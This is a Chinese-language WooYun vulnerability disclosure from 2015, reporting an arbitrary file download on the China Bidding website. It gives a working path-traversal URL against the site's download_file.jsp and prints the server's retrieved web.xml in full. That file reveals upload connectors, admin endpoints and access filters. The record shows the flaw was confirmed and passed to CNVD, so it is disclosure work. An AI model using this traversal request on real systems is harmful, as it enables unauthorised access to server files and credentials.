当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0118646

漏洞标题:中国采购与招标网主站任意文件下载

相关厂商:中国采购与招标网

漏洞作者: 路人甲

提交时间:2015-06-09 11:33

修复时间:2015-07-24 13:56

公开时间:2015-07-24 13:56

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:13

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-09: 细节已通知厂商并且等待厂商处理中
2015-06-09: 厂商已经确认,细节仅向厂商公开
2015-06-19: 细节向核心白帽子及相关领域专家公开
2015-06-29: 细节向普通白帽子公开
2015-07-09: 细节向实习白帽子公开
2015-07-24: 细节向公众公开

简要描述:

一组下载

详细说明:

http://www.chinabidding.com.cn/download/download_file.jsp?record_id=4231669&filename=web.xml&filepath=../../../WEB-INF


2.jpg

1.jpg


<?xml version="1.0" encoding="ISO-8859-1"?>
<web-app>
<!-- 公用 开始-->
<servlet>
<servlet-name>TemplateLoad</servlet-name>
<servlet-class>com.cbl.lib.InitTemplateServlet</servlet-class>
<init-param>
<param-name>templates.path</param-name>
<param-value>WEB-INF/conf/templates.properties</param-value>
</init-param>
<load-on-startup>1</load-on-startup>
</servlet>
<servlet-mapping>
<servlet-name>TemplateLoad</servlet-name>
<url-pattern>/TemplateLoad</url-pattern>
</servlet-mapping>
<servlet servlet-name='MapDataServlet'
servlet-class='jbs.runat.MapDataServlet'>
<load-on-startup>2</load-on-startup>
</servlet>
<!--
<servlet servlet-name='RepairLoginoutServlet'
servlet-class='jbs.listener.RepairLoginoutServlet'>
<load-on-startup>3</load-on-startup>
</servlet>
-->
<directory-servlet>none</directory-servlet>
<!-- 公用 结束-->
<!-- 前台用 开始-->
<taglib>
<taglib-uri>oscache</taglib-uri>
<taglib-location>/WEB-INF/classes/oscache.tld</taglib-location>
</taglib>

<servlet>
<servlet-name>ImgServlet</servlet-name>
<servlet-class>jbs.image.ImgServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>ImgServlet</servlet-name>
<url-pattern>/zbw/zbxx/images/79.jpg</url-pattern>
</servlet-mapping>
<servlet>
<servlet-name>FbcgxxServlet</servlet-name>
<servlet-class>jbs.image.FbcgxxServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>FbcgxxServlet</servlet-name>
<url-pattern>/zbw/images/lk.jpg</url-pattern>
</servlet-mapping>
<servlet>
<servlet-name>RegServlet</servlet-name>
<servlet-class>jbs.image.RegServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>RegServlet</servlet-name>
<url-pattern>/zbw/member/images/register_27.jpg</url-pattern>
</servlet-mapping>
<servlet>
<servlet-name>XmlServlet</servlet-name>
<servlet-class>jbs.runat.CreateXmlServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>XmlServlet</servlet-name>
<url-pattern>/xml/manualCreateXml</url-pattern>
</servlet-mapping>
<servlet>
<servlet-name>MailServlet</servlet-name>
<servlet-class>jbs.runat.KfzxInfoAutoSentndServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>MailServlet</servlet-name>
<url-pattern>/zbw/sentmail</url-pattern>
</servlet-mapping>
<!-- Axis Web-Service Configuration Start -->

<servlet>
<servlet-name>AxisServlet</servlet-name>
<display-name>Apache-Axis Servlet</display-name>
<servlet-class>
org.apache.axis.transport.http.AxisServlet
</servlet-class>
</servlet>
<servlet>
<servlet-name>AdminServlet</servlet-name>
<display-name>Axis Admin Servlet</display-name>
<servlet-class>
org.apache.axis.transport.http.AdminServlet
</servlet-class>
<load-on-startup>100</load-on-startup>
</servlet>
<servlet>
<servlet-name>SOAPMonitorService</servlet-name>
<display-name>SOAPMonitorService</display-name>
<servlet-class>
org.apache.axis.monitor.SOAPMonitorService
</servlet-class>
<init-param>
<param-name>SOAPMonitorPort</param-name>
<param-value>5001</param-value>
</init-param>
<load-on-startup>100</load-on-startup>
</servlet>
<servlet-mapping>
<servlet-name>AxisServlet</servlet-name>
<url-pattern>/servlet/AxisServlet</url-pattern>
</servlet-mapping>
<servlet-mapping>
<servlet-name>AxisServlet</servlet-name>
<url-pattern>*.jws</url-pattern>
</servlet-mapping>
<servlet-mapping>
<servlet-name>AxisServlet</servlet-name>
<url-pattern>/services/*</url-pattern>
</servlet-mapping>
<servlet-mapping>
<servlet-name>SOAPMonitorService</servlet-name>
<url-pattern>/SOAPMonitor</url-pattern>
</servlet-mapping>
<!-- uncomment this if you want the admin servlet -->
<!--
<servlet-mapping>
<servlet-name>AdminServlet</servlet-name>
<url-pattern>/servlet/AdminServlet</url-pattern>
</servlet-mapping>
-->
<session-config>
<!-- Default to 5 minute session timeouts -->
<session-timeout>1</session-timeout>
</session-config>
<!--
<listener>
<listener-class>
jbs.listener.OnlineCounterListener
</listener-class>
</listener>
-->
<!-- currently the W3C havent settled on a media type for WSDL;
http://www.w3.org/TR/2003/WD-wsdl12-20030303/#ietf-draft
for now we go with the basic 'it's XML' response -->
<mime-mapping>
<extension>wsdl</extension>
<mime-type>text/xml</mime-type>
</mime-mapping>

<mime-mapping>
<extension>xsd</extension>
<mime-type>text/xml</mime-type>
</mime-mapping>
<welcome-file-list id="WelcomeFileList">
<welcome-file>index.jsp</welcome-file>
<welcome-file>index.html</welcome-file>
<welcome-file>index.jws</welcome-file>
</welcome-file-list>
<!-- Axis Web-Service Configuration End -->
<!-- 前台用 结束-->
<!-- 后台用 开始-->

<servlet>
<servlet-name>Connector</servlet-name>
<servlet-class>com.fredck.FCKeditor.connector.ConnectorServlet</servlet-class>
<init-param>
<param-name>baseDir</param-name>
<param-value>/paihang_images/</param-value>
</init-param>
<init-param>
<param-name>debug</param-name>
<param-value>false</param-value>
</init-param>
<init-param>
<param-name>AllowedExtensionsFile</param-name>
<param-value>|jpg|gif|jpeg|png|bmp|swf|</param-value>
</init-param>
<init-param>
<param-name>DeniedExtensionsFile</param-name>
<param-value></param-value>
</init-param>
<load-on-startup>1</load-on-startup>
</servlet>
<servlet-mapping>
<servlet-name>Connector</servlet-name>
<url-pattern>/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector</url-pattern>
</servlet-mapping>
<filter>
<filter-name>permission</filter-name>
<filter-class>com.cbl.lib.Permission</filter-class>
</filter>
<filter-mapping>
<filter-name>permission</filter-name>
<url-pattern>/info/*</url-pattern>
</filter-mapping>
<filter-mapping>
<filter-name>permission</filter-name>
<url-pattern>/provider/*</url-pattern>
</filter-mapping>
<filter-mapping>
<filter-name>permission</filter-name>
<url-pattern>/association/*</url-pattern>
</filter-mapping>
<filter-mapping>
<filter-name>permission</filter-name>
<url-pattern>/right/*</url-pattern>
</filter-mapping>
<filter-mapping>
<filter-name>permission</filter-name>
<url-pattern>/sysmanage/*</url-pattern>
</filter-mapping>
<servlet>
<servlet-name>CreateAttentionHtmlServlet</servlet-name>
<servlet-class>jbs.runat.CreateAttentionHtmlServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>CreateAttentionHtmlServlet</servlet-name>
<url-pattern>/CreateAttentionHtmlServlet</url-pattern>
</servlet-mapping>

<!-- 所有后台任务需在23:00~01:00间执行完毕-->
<servlet servlet-name='userTask'
servlet-class='jbs.runat.userTask'>
<run-at>23:50</run-at>
</servlet>
<!-- 所有后台任务需在23:00~01:00间执行完毕-->
<!-- 后台用 结束-->
</web-app>
文件没有发现!

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2015-06-09 13:55

厂商回复:

CNVD确认并复现所述情况,已经由CNVD通过网站公开联系方式向网站管理单位通报。

最新状态:

暂无